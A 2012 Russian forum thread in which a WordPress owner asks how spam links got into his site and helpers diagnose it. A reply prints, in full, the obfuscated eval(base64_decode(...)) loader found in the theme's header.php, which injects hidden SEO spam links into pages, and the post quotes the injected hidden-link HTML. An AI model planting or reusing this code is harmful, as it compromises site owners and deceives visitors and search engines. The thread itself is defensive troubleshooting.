welinux.ru / Есть проблема! — Взломали wordpress.

uscr 13.04.2012 15:03

Есть проблема! — Взломали wordpress.

Заметил, что при просмотре статей около заголовка статьи появилась буква 't'. Я полез искать косяк, но видно косяк только в исходном коде страницы - в шаблонах найти эту букву не удалось. Выглядит "косяк" так:

          t
<style type="text/css" media="screen">#stlp{top:0px;margin-left:-9999px;position:fixed;}</style>
<span id="stlp"><a href="http://ссылко1.by/articles/news">шины</a>
<a href="http://ссылко2.by/category/makiyazh/vechernij-makiyazh">Свадебный макияж</a>
<a href="http://ссылко3.by/articles/news">летние шины</a>
<a href="http://www.ссылко4.by/">купить авто</a>
<a href="http://www.ссылко5.ru/">домен</a>
<a href="http://ссылко6.by/">Живой уголок он-лайн</a>
<br>
<a href="http://ссылко7.com/solutions/web-call-center/">Call Center</a></span>
                        <div class="post single">

Интересует: как найти ответственный за сие безобразие код.
Файлы в бекапе за 23.03.2012 и текущем каталоге сайта идентичны, однако, эта буква "t" появилась совсем недавно (в пределах последней недели).

Вторичная задача: определить метод взлома. Пока понятно, что сломали либо апач, либо сам вордпресс, ибо другими портами, кроме 80 сервер просто не смотрит в интернет.

Версия WP 3.3.1, тема idiandong скачивал с wordpress.org.

UPD.
Сменил тему - реклама исчезла. Переустанавливаю темя, в скрипт бекапа добавляю отдельный бекап каталога с темой :)

Вопрос с методом взлома оставляю открытым.

UPD2.
Сейчас просматривал диффы переустановленной темы и старой и вспомнил, что ставил с wpfree русский перевод. Так что я ССЗБ.

Тэги:

+ 1 -

Похожие

darkrain 13.04.2012 15:56 #

+ 0 -

А версия вп какая?

uscr 13.04.2012 17:34 # ↑

+ 0 -

3.3.1

Shtsh 13.04.2012 17:45 #

+ 0 -

grep -R t$ /где/там/у/тебя/вордпресс ничего не говорит?

uscr 13.04.2012 18:35 # ↑

+ 0 -

Молчит.

Shtsh 13.04.2012 17:55 #

+ 1 -

http://www.xakep.ru/vulnerability/WordPress/

Сюда заглядывал?

uscr 13.04.2012 18:36 # ↑

+ 0 -

Посмотрю, спасибо.

darkrain 13.04.2012 18:03 #

+ 0 -

Не, там вроде ничего нет. а может не в вп дело? А просто где нибудь свистнули фтп ак, такое частенько бывает

uscr 13.04.2012 18:36 # ↑

+ 0 -

FTP нет.

darkrain 13.04.2012 18:22 #

+ 0 -

прикрепи сюда тему зараженную, я хочу глянуть

uscr 13.04.2012 18:42 # ↑

+ 0 -

Промахнулся.

uscr 13.04.2012 18:42 #

+ 0 -

Вот.

le087 13.04.2012 19:11 #

+ 1 -

Я бы попробовал поступить следующим образом:
1. Предположим ты не делал никакие действия с файлами вордпресса последний месяц-другой... Тогда стоит провести поиск файлов измененных или созданных фалов не позже какой-то даты.. после которой сайт уже мог быть заражен. Смотришь когда и что было изменено или создано. Находишь.
2. Лезешь в логи апач и смотришь на дату и время создания/модификации файла и видишь IP, с которого было произведено заражения, там же вероятнее всего будет видно и способ, которым оно произошло. Может быть шел найдется или еще чего.
3. Ну а дальше принимаешь меры.

uscr 13.04.2012 21:03 # ↑

+ 0 -

Да. Ступил. Дата изменения - это очевидно же. Но теперь поздно. Уже перенёс каталог с темой. Теперь только ковырять пофайлово.

Кстати, стоит плагин WordPress File Monitor, но он промолчал.

Astramak 16.04.2012 00:57 # ↑

+ 1 -

Кстати, стоит плагин WordPress File Monitor, но он промолчал.

Это невозможно.

Astramak 13.04.2012 20:35 #

+ 4 -

В header.php

<?php eval(base64_decode('JGZ0PWRpcm5hbWUoX19maWxlX18pLicvaW1hZ2VzL3dwX21lbnVfdG9wLnBuZyc7ICRiZj0kd3BkYi0+Z2V0X3JvdygiU0VMRUNUICogRlJPTSAkd3BkYi0+b3B0aW9ucyBXSEVSRSBgb3B0aW9uX25hbWVgPSd3cF90aGVtZV9tZW51X2ZpcnN0JyBMSU1JVCAxIik7IGlmIChmaWxlX2V4aXN0cygkZnQpIGFuZCAhJGJmKXskZnAgPSBmb3BlbigkZnQsInIiKTsgJHNzID0gZnJlYWQoJGZwLGZpbGVzaXplKCRmdCkpOyBmY2xvc2UoJGZwKTsgZXZhbCgnJG1zcz0nLmd6dW5jb21wcmVzcyhzdHJpcHNsYXNoZXMoJHNzKSkuJzsnKTsgJGk9JG1zc1swXTsgJGkxPSRtc3NbMV07ICRpMj0kbXNzWzJdOyB1bnNldCAoJG1zc1swXSwkbXNzWzFdLCRtc3NbMl0pOyBzcmFuZCgoZmxvYXQpbWljcm90aW1lKCkqMTAwMDAwMCk7IHNodWZmbGUoJG1zcyk7ICRjc3NbMF0gPSAkaTEuZ2V0X2Jsb2dpbmZvKCduYW1lJykuJGkyLiRtc3NbMF0uJGkuJG1zc1sxXS4nLic7ICRjc3NbMV0gPSAkaTEuZ2V0X2Jsb2dpbmZvKCduYW1lJykuJGkyLiRtc3NbMl0uJGkuJG1zc1szXS4nLic7ICR3cGRiLT5xdWVyeSgiSU5TRVJUIElOVE8gJHdwZGItPm9wdGlvbnMgKG9wdGlvbl9uYW1lLG9wdGlvbl92YWx1ZSxhdXRvbG9hZCkgVkFMVUVTICgnd3BfdGhlbWVfbWVudV9maXJzdCcsJyIuYmFzZTY0X2VuY29kZSgkY3NzWzBdKS4iJywnbm8nKSIpOyAkd3BkYi0+cXVlcnkoIklOU0VSVCBJTlRPICR3cGRiLT5vcHRpb25zIChvcHRpb25fbmFtZSxvcHRpb25fdmFsdWUsYXV0b2xvYWQpIFZBTFVFUyAoJ3dwX3RoZW1lX21lbnVfc2Vjb25kJywnIi5iYXNlNjRfZW5jb2RlKCRjc3NbMV0pLiInLCdubycpIik7fSBmdW5jdGlvbiBmbigpe2dsb2JhbCAkd3BkYjsgJGJmPSR3cGRiLT5nZXRfcm93KCJTRUxFQ1QgKiBGUk9NICR3cGRiLT5vcHRpb25zIFdIRVJFIGBvcHRpb25fbmFtZWA9J3dwX3RoZW1lX21lbnVfZmlyc3QnIExJTUlUIDEiKTsgJGJzPSR3cGRiLT5nZXRfcm93KCJTRUxFQ1QgKiBGUk9NICR3cGRiLT5vcHRpb25zIFdIRVJFIGBvcHRpb25fbmFtZWA9J3dwX3RoZW1lX21lbnVfc2Vjb25kJyBMSU1JVCAxIik7IGlmKChpc19ob21lKCkpJiYhKGlzX3BhZ2VkKCkpKSAkbm49YmFzZTY0X2RlY29kZSgkYmYtPm9wdGlvbl92YWx1ZSk7IGVsc2UgJG5uPWJhc2U2NF9kZWNvZGUoJGJzLT5vcHRpb25fdmFsdWUpOyByZXR1cm4gJG5uO30gZnVuY3Rpb24gY2IoJGJmKXskZG8gPSAiPC9ib2R5PiI7ICRuYSA9ICIJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQk8ZGl2IHN0eWxlPVwicG9zaXRpb246YWJzb2x1dGU7bGVmdDotMTI0NXB4O3dpZHRoOi0yMzU2cHg7XCI+Ii5mbigpLiI8L2Rpdj5cbjwvYm9keT4iOyByZXR1cm4gZXJlZ2lfcmVwbGFjZSgkZG8sICRuYSwgJGJmKTt9IGlmICgkYmYpIG9iX3N0YXJ0KCJjYiIpOw=='));??>

Стирай и радуйся

uscr 13.04.2012 20:54 # ↑

+ 0 -

Спасибо. Переустановил тему. Тоже не плохо :)

Astramak 13.04.2012 20:41 #

+ 4 -

Взлом такого рода идет какими угодно путями:

- Подбор админского пароля - инклуд кода в тему через редактор
- Подбор фтп
- Левый плагин-"выжидальщик" момента
- Левая тема с уже предустановленным кодом (чаще обычные ссылки с display none)

Обычно гадость работает несколько иначе и заменяет своим кодом все что начинается с ?php, добавляя свою шляпу. Так что можно сказать ещё повезло :)